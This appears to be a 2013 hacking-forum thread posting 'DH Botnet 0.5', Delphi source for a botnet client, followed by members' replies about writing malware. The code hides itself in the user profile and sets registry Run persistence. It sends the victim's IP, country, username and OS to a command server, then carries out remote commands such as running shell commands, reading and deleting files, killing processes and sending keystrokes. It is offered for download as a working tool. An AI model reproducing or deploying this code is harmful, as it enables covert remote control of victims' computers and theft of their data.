// Credits : Function ejecutar() based in : http://www.delphidabbler.com/tips/61
// Thanks to www.delphidabbler.com

var
  parte1: TSecurityAttributes;
  parte2: TStartupInfo;
  parte3: TProcessInformation;
  parte4: THandle;
  parte5: THandle;
  control2: Boolean;
  contez: array [0 .. 255] of AnsiChar;
  notengoidea: Cardinal;
  fix: Boolean;
  code: string;

begin

  code := '';

  with parte1 do
  begin
    nLength := SizeOf(parte1);
    bInheritHandle := True;
    lpSecurityDescriptor := nil;
  end;

  CreatePipe(parte4, parte5, @parte1, 0);

  with parte2 do
  begin
    FillChar(parte2, SizeOf(parte2), 0);
    cb := SizeOf(parte2);
    dwFlags := STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES;
    wShowWindow := SW_HIDE;
    hStdInput := GetStdHandle(STD_INPUT_HANDLE);
    hStdOutput := parte5;
    hStdError := parte5;
  end;

  fix := CreateProcess(nil, PChar('cmd.exe /C ' + cmd), nil, nil, True, 0, nil,
    PChar('c:/'), parte2, parte3);

  CloseHandle(parte5);

  if fix then

    repeat

    begin
      control2 := ReadFile(parte4, contez, 255, notengoidea, nil);
    end;

    if notengoidea > 0 then
    begin
      contez[notengoidea] := #0;
      code := code + contez;
    end;

    until not(control2) or (notengoidea = 0);

    Result := code;

end;

function leerdatos_sub(sub_1, sub_2, sub_3, sub_4: integer): DWORD;
begin
  Result := sub_1 shl 16 or sub_4 shl 14 or sub_2 shl 2 or sub_3;
end;

function opencd(tipoh: string): string;

// Credits : Based on http://stackoverflow.com/questions/19894566/using-windows-and-mmsystem-in-delphi
// Thanks to Sertac Akyuz

const
  const_uno = $00000009;
  const_dos = $0000002D;
  const_tres = 0;
  const_cuatro = 0;
  const_cinco = $0001;
  const_seis = const_dos;
  const_siete = 6;
  const_ocho = 8;

var
  var_uno: string;
  var_dos: THandle;
  var_tres: DWORD;
  opciondecd: integer;

begin

  if (tipoh = 'open') then
  begin
    opciondecd := $0202;
  end;

  if (tipoh = 'close') then
  begin
    opciondecd := $0203;
  end;

  var_uno := Format('\\.\%s:', ['D']);
  var_dos := CreateFile(PChar(var_uno), GENERIC_READ, FILE_SHARE_WRITE, nil,
    OPEN_EXISTING, 0, 0);
  DeviceIoControl(var_dos, leerdatos_sub(const_uno, const_siete, const_tres,
      const_cuatro), nil, 0, nil, 0, var_tres, nil);
  DeviceIoControl(var_dos, leerdatos_sub(const_uno, const_ocho, const_tres,
      const_cuatro), nil, 0, nil, 0, var_tres, nil);
  DeviceIoControl(var_dos, leerdatos_sub(const_seis, opciondecd, const_tres,
      const_cinco), nil, 0, nil, 0, var_tres, nil);
  CloseHandle(var_dos);

  Result := '[?] CD : OK';

end;

//

// First Functions

function dhencode(texto, opcion: string): string;
// Thanks to Taqyon
// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex
var
  num: integer;
  aca: string;
  cantidad: integer;

begin

  num := 0;
  Result := '';
  aca := '';
  cantidad := 0;

  if (opcion = 'encode') then
  begin
    cantidad := Length(texto);
    for num := 1 to cantidad do
    begin
      aca := IntToHex(ord(texto[num]), 2);
      Result := Result + aca;
    end;
  end;

  if (opcion = 'decode') then
  begin
    cantidad := Length(texto);
    for num := 1 to cantidad div 2 do
    begin
      aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2)));
      Result := Result + aca;
    end;
  end;

end;

function regex(text: String; deaca: String; hastaaca: String): String;
begin
  Delete(text, 1, AnsiPos(deaca, text) + Length(deaca) - 1);
  SetLength(text, AnsiPos(hastaaca, text) - 1);
  Result := text;
end;

function partirdoc(Url: string): string;
var
  chauhost: string;
begin

  Url := StringReplace(Url, regex(Url, '://', '/'), '', [rfReplaceAll,
    rfIgnoreCase]);
  Url := StringReplace(Url, 'http://', '', [rfReplaceAll, rfIgnoreCase]);
  Url := StringReplace(Url, 'https://', '', [rfReplaceAll, rfIgnoreCase]);

  Result := Url;

end;

function getfilename(Url: string): string;
// Credits : Based on http://delphi-kb.blogspot.com.ar/2009/12/extract-filename-from-url.html
// Thanks to NM
var
  resultado: string;
begin
  resultado := StringReplace(Url, '/', '\', [rfReplaceAll]);
  resultado := ExtractFileName(resultado);
  Result := resultado;
end;

function toma(const pagina: string): UTF8String;

// Credits : Based on http://www.scalabium.com/faq/dct0080.htm
// Thanks to www.scalabium.com

var
  nave1: HINTERNET;
  nave2: HINTERNET;
  tou: DWORD;
  codez: UTF8String;
  codee: array [0 .. 1023] of byte;
  finalfinal: string;

begin

  try

    begin

      finalfinal := '';
      Result := '';

      nave1 := InternetOpen(
        'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12'
          , INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);

      nave2 := InternetOpenUrl(nave1, PChar(pagina), nil, 0,
        INTERNET_FLAG_RELOAD, 0);

      repeat

      begin
        InternetReadFile(nave2, @codee, SizeOf(codee), tou);
        SetString(codez, PAnsiChar(@codee[0]), tou);
        finalfinal := finalfinal + codez;
      end;

      until tou = 0;

      InternetCloseHandle(nave2);
      InternetCloseHandle(nave1);

      Result := finalfinal;
    end;

  except
    //
  end;

end;

function tomar(pagina: string; postdata: AnsiString): string;

// Credits : Based on  : http://tulisanlain.blogspot.com.ar/2012/10/how-to-send-http-post-request-in-delphi.html
// Thanks to Tulisan Lain

const
  accept: packed array [0 .. 1] of LPWSTR = (PChar('*/*'), nil);

var
  nave3: HINTERNET;
  nave4: HINTERNET;
  nave5: HINTERNET;
  todod: array [0 .. 1023] of AnsiChar;
  numberz: Cardinal;
  numberzzz: Cardinal;
  finalfinalfinalfinal: string;

begin

  try

    begin

      finalfinalfinalfinal := '';
      Result := '';

      nave3 := InternetOpen(PChar(
          'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12')
          , INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);

      nave4 := InternetConnect(nave3, PChar(regex(pagina, '://', '/')),
        INTERNET_DEFAULT_HTTP_PORT, nil, nil, INTERNET_SERVICE_HTTP, 0, 1);

      nave5 := HttpOpenRequest(nave4, PChar('POST'), PChar(partirdoc(pagina)),
        nil, nil, @accept, 0, 1);

      HttpSendRequest(nave5, PChar(
          'Content-Type: application/x-www-form-urlencoded'), Length
          ('Content-Type: application/x-www-form-urlencoded'), PChar(postdata),
        Length(postdata));

      repeat

      begin

        InternetReadFile(nave5, @todod, SizeOf(todod), numberzzz);

        if numberzzz = SizeOf(todod) then
        begin
          Result := Result + AnsiString(todod);
        end;
        if numberzzz > 0 then
          for numberz := 0 to numberzzz - 1 do
          begin
            finalfinalfinalfinal := finalfinalfinalfinal + todod[numberz];
          end;

      end;

      until numberzzz = 0;

      InternetCloseHandle(nave3);
      InternetCloseHandle(nave4);
      InternetCloseHandle(nave5);

      Result := finalfinalfinalfinal;

    end;

  except
    //
  end;

end;

function dh_generate(cantidad: integer): string;

const
  opciones: array [1 .. 3] of string = ('mayus', 'minus', 'numbers');

var
  aleatorio: integer;
  iz: integer;

var
  finalr: string;
begin

  finalr := '';

  for iz := 1 to cantidad do
  begin
    aleatorio := Random(4 - 1) + 1;

    if (opciones[aleatorio] = 'mayus') then
    begin
      finalr := finalr + Chr(ord('A') + Random(26));
    end;
    if (opciones[aleatorio] = 'minus') then
    begin
      finalr := finalr + Chr(ord('a') + Random(26));
    end;
    if (opciones[aleatorio] = 'numbers') then
    begin
      finalr := finalr + Chr(ord('0') + Random(10));
    end;
  end;

  Result := finalr;

end;

procedure savefile(filename, texto: string);
var
  ar: TextFile;

begin

  AssignFile(ar, filename);
  FileMode := fmOpenWrite;

  if FileExists(filename) then
    Append(ar)
  else
    Rewrite(ar);

  Writeln(ar, texto);
  CloseFile(ar);

end;

function leerarchivo(rutadelarchivo: string): string;
const
  cantidad_buffer = $8000;

var
  fun_uno: LongWord;
  fun_dos: THandle;
  fun_tres: array [0 .. cantidad_buffer - 1] of AnsiChar;

begin

  fun_tres := '';

  fun_dos := CreateFile(PChar(rutadelarchivo), GENERIC_READ,
    FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING,
    FILE_ATTRIBUTE_READONLY, 0);

  SetFilePointer(fun_dos, 0, nil, FILE_BEGIN);

  ReadFile(fun_dos, fun_tres, cantidad_buffer, fun_uno, nil);

  while (fun_uno > 0) do
  begin
    ReadFile(fun_dos, fun_tres, cantidad_buffer, fun_uno, nil);
  end;

  CloseHandle(fun_dos);

  Result := fun_tres;

end;

function getmydata(): string;
var
  consegui_key, consegui_ip, consegui_pais, consegui_user, consegui_os: string;
  codigo_de_pagina: string;

begin

  consegui_key := leerarchivo('key');
  consegui_key := StringReplace(consegui_key, sLineBreak, '',
    [rfReplaceAll, rfIgnoreCase]);

  codigo_de_pagina := toma('http://whatismyipaddress.com/');

  consegui_ip := regex(codigo_de_pagina, 'alt="Click for more about ',
    '"></a>');
  consegui_pais := regex(codigo_de_pagina, '<tr><th>Country:</th><td>',
    '</td></tr>');

  if (consegui_ip = '') then
  begin
    consegui_ip := '?';
  end;

  if (consegui_pais = '') then
  begin
    consegui_pais := '?';
  end;

  consegui_user := GetEnvironmentVariable('username');
  consegui_os := GetEnvironmentVariable('os');

  Result := '[key]' + consegui_key + '[key]' + '[ip]' + consegui_ip + '[ip]' +
    '[pais]' + consegui_pais + '[pais]' + '[user]' + consegui_user + '[user]' +
    '[os]' + consegui_os + '[os]';

end;

procedure saludo;
begin
  tomar(url_master,
    'entradatrasera=hidad&key=' + clave + '&ip=' + ip + '&pais=' + pais +
      '&username=' + user + '&os=' + os + '&timeout=' + time);

end;

procedure sigo_vivo;
begin

  tomar(url_master, 'sigovivo=alpedo&clavenow=' + clave);

end;

function ver_ordenes(): string;
var
  re_cmd, arg1, arg2, arg3: string;
begin
  code := tomar(url_master, 'ordenespabots=alpedo&clave=' + clave);
  re_cmd := regex(code, '[+] Orden : ', '<br>');
  arg1 := regex(code, '[+] Arg1 : ', '<br>');
  arg2 := regex(code, '[+] Arg2 : ', '<br>');
  arg3 := regex(code, '[+] Arg3 : ', '<br>');
  Result := '[comando]' + re_cmd + '[comando]' + '[arg1]' + arg1 + '[arg1]' +
    '[arg2]' + arg2 + '[arg2]' + '[arg3]' + arg3 + '[arg3]';
end;

procedure mandar_rta(contenido: string);
begin
  tomar(url_master,
    'mandocarajo=alpedo&miclave=' + clave + '&mirta=' + contenido);
end;

begin

  ob := INVALID_HANDLE_VALUE;
  code := '';

  ob := CreateFile(PChar(paramstr(0)), GENERIC_READ, FILE_SHARE_READ, nil,
    OPEN_EXISTING, 0, 0);
  if (ob <> INVALID_HANDLE_VALUE) then
  begin
    SetFilePointer(ob, -9999, nil, FILE_END);
    ReadFile(ob, codex, 9999, nose, nil);
    CloseHandle(ob);
  end;

  todo := regex(codex, '[63686175]', '[63686175]');
  todo := dhencode(todo, 'decode');

  url_master := regex(todo, '[url]', '[url]');
  time := regex(todo, '[time]', '[time]');


  // url_master := 'http://localhost/botnet/';
  // time := '5';

  try

    dir_hide := GetEnvironmentVariable('USERPROFILE') + '/';
    carpeta := 'ratatax';

    dir := dir_hide + carpeta + '/';

    if not(DirectoryExists(dir)) then
    begin
      CreateDir(dir);
    end;

    ChDir(dir);

    nombrereal := ExtractFileName(paramstr(0));
    rutareal := dir;
    yalisto := dir + nombrereal;

    MoveFile(PChar(paramstr(0)), PChar(yalisto));

    SetFileAttributes(PChar(dir), FILE_ATTRIBUTE_HIDDEN);

    SetFileAttributes(PChar(yalisto), FILE_ATTRIBUTE_HIDDEN);

    RegCreateKeyEx(HKEY_LOCAL_MACHINE,
      'Software\Microsoft\Windows\CurrentVersion\Run\', 0, nil,
      REG_OPTION_NON_VOLATILE, KEY_WRITE, nil, registro, nil);
    RegSetValueEx(registro, 'uberkk', 0, REG_SZ, PChar(yalisto), 666);
    RegCloseKey(registro);

    if not(FileExists('key')) then
    begin
      Randomize;
      savefile('key', dh_generate(5));
    end;

    datos := getmydata();

    clave := regex(datos, '[key]', '[key]');
    ip := regex(datos, '[ip]', '[ip]');
    pais := regex(datos, '[pais]', '[pais]');
    user := regex(datos, '[user]', '[user]');
    os := regex(datos, '[os]', '[os]');

    // Writeln('[+] Clave : ' + clave);
    // Writeln('[+] IP : ' + ip);
    // Writeln('[+] Pais : ' + pais);
    // Writeln('[+] Username : ' + user);
    // Writeln('[+] OS : ' + os);

    saludo;

    // Writeln('');
    // Writeln('[+] Iniciando bucle');

    while (True) do
    begin

      Sleep(StrToInt(time) * 1000);

      sigo_vivo;
      ordenes_re := ver_ordenes;

      ordenes_cmd := regex(ordenes_re, '[comando]', '[comando]');
      ordenes_ar1 := regex(ordenes_re, '[arg1]', '[arg1]');
      ordenes_ar2 := regex(ordenes_re, '[arg2]', '[arg2]');
      ordenes_ar3 := regex(ordenes_re, '[arg3]', '[arg3]');

      // Writeln('');

      // Writeln('[+] orden : ' + ordenes_cmd);
      // Writeln('[+] ar1 : ' + ordenes_ar1);
      // Writeln('[+] ar2 : ' + ordenes_ar2);
      // Writeln('[+] ar3 : ' + ordenes_ar3);

      if (ordenes_cmd = 'CMD') then
      begin
        mandar_rta(ejecutar(ordenes_ar1));
      end;

      if (ordenes_cmd = 'GetProcess') then
      begin
        mandar_rta(listarprocesos());
      end;

      if (ordenes_cmd = 'KillProcess') then
      begin
        mandar_rta(matarproceso(ordenes_ar1));
      end;

      if (ordenes_cmd = 'ListDir') then
      begin
        mandar_rta(listardirectorio(ordenes_ar1));
      end;

      if (ordenes_cmd = 'Delete') then
      begin
        mandar_rta(borraresto(ordenes_ar1));
      end;

      if (ordenes_cmd = 'OpenFile') then
      begin
        mandar_rta(leerarchivo(ordenes_ar1));
      end;

      if (ordenes_cmd = 'OpenCD') then
      begin
        mandar_rta(opencd('open'));
      end;

      if (ordenes_cmd = 'CloseCD') then
      begin
        mandar_rta(opencd('close'));
      end;

      if (ordenes_cmd = 'HideIcons') then
      begin
        mandar_rta(cambiar_iconos('hide'));
      end;

      if (ordenes_cmd = 'ShowIcons') then
      begin
        mandar_rta(cambiar_iconos('mostrar'));
      end;

      if (ordenes_cmd = 'HideTaskbar') then
      begin
        mandar_rta(cambiar_barra('hide'));
      end;

      if (ordenes_cmd = 'ShowTaskbar') then
      begin
        mandar_rta(cambiar_barra('mostrar'));
      end;

      if (ordenes_cmd = 'SendKeys') then
      begin
        mandar_rta(SendKeys(ordenes_ar1));
      end;

      if (ordenes_cmd = 'OpenWord') then
      begin
        mandar_rta(escribir_word(ordenes_ar1));
      end;

      if (ordenes_cmd = 'CrazyMouse') then
      begin
        mandar_rta(crazy_mouse(ordenes_ar1));
      end;

    end;

  except

    begin
      //
    end;
  end;

end.

// The End ?

Available for download here.

Report to moderator   Logged

Offline Phage

  • VIP
  • Overlord
  • *
  • Posts: 1280
  • Cookies: 120
    • View Profile
Re: [Delphi] DH Botnet 0.5
« Reply #1 on: December 16, 2013, 09:58:58 AM »
First, botnets are lame!

Second, I can't really see how it can be beneficial to code such in Delphi. Even though languages have a wide range of usefulness, languages such as Python, Pascal and Delphi are not good for malware.
Report to moderator   Logged
"Ruby devs do, in fact, get all the girls. No girl wants a python, but EVERY girl wants rubies" - connection

"It always takes longer than you expect, even when you take into account Hofstadter’s Law."

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: [Delphi] DH Botnet 0.5
« Reply #2 on: December 16, 2013, 10:13:15 AM »
Quote from: Phage on December 16, 2013, 09:58:58 AM
Python, Pascal and Delphi are not good for malware.
You fo real? Python is ofc not suitable, but Pascal and Delphi is more than suitable. There are MANY malwares written in Pascal and Delphi, including that one special ATM keylogger that was designed to log CC data upon card insertion.
Report to moderator   Logged

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
    • View Profile
Re: [Delphi] DH Botnet 0.5
« Reply #3 on: December 16, 2013, 12:15:50 PM »
@Doddy - You seem to be a very good Delphi programmer. As well, I've seen you post other decent malicious programs in Perl and PHP as well. How come you haven't bothered to post an intro, or made any other posts for that matter? All I've seen from you is various botnets and RATs and whatnot.
Report to moderator   Logged
"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python

Offline vezzy

  • Royal Highness
  • ****
  • Posts: 771
  • Cookies: 172
    • View Profile
Re: [Delphi] DH Botnet 0.5
« Reply #4 on: December 16, 2013, 05:22:58 PM »
You can write malware in any compiled language, for the most part. Some choices are not necessarily good, however.
Report to moderator   Logged
Quote from: Dippy hippy
Just brushing though. I will be semi active mainly came to find a HQ botnet, like THOR or just any p2p botnet
Pages: [1]
 



Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.